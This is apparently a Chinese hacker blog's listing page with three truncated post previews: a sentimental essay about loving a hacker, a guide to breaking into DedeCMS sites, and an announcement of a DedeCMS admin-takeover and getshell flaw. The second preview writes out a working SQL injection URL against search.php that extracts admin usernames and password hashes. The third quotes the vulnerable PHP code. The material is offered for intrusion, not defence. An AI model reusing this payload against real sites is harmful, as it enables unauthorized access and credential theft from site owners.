-
黑客注定孤独,黑客注定寂寞!
黑客注定孤独,黑客注定寂寞! 女孩,请不要爱上一名黑客 当你爱上黑客,就等于你爱上了一个郁闷的人生…… 当他追求你的时候,你会很幸福、很快乐,那个时候他会决得你是他生命中第一重要的,因为那是热恋阶段。 当你和他正式交往以后,你会感觉到自己的存在似乎是没有必要的,因为你根本就没有办法融入到他的生活和世界中去。 当你们已经走到一起要谈婚论嫁的时候,你会觉...阅读全文阅读全文
-
入侵dedecms站 找后台的一些小经验分享
首先: 注入exp 有时候 有些 /plus/目录换成了 /plugins目录 /plugins/search.php?keyword=as&typeArr[111%3D@`\’`) +UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+ from+`%23@__admin`%23@`\’`+]=a /plus/search.php?keyword=as&typeArr[111%3D@`\...阅读全文
-
dedecms织梦系统最新版本修改任意管理员漏洞及getshell
此漏洞无视gpc转义,过80sec注入防御。 补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL? 起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。 [php]include/dedesql.class.php if(isset($GLOBALS[‘arrs1’])) { $v1 = $v2 = ”; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1...阅读全文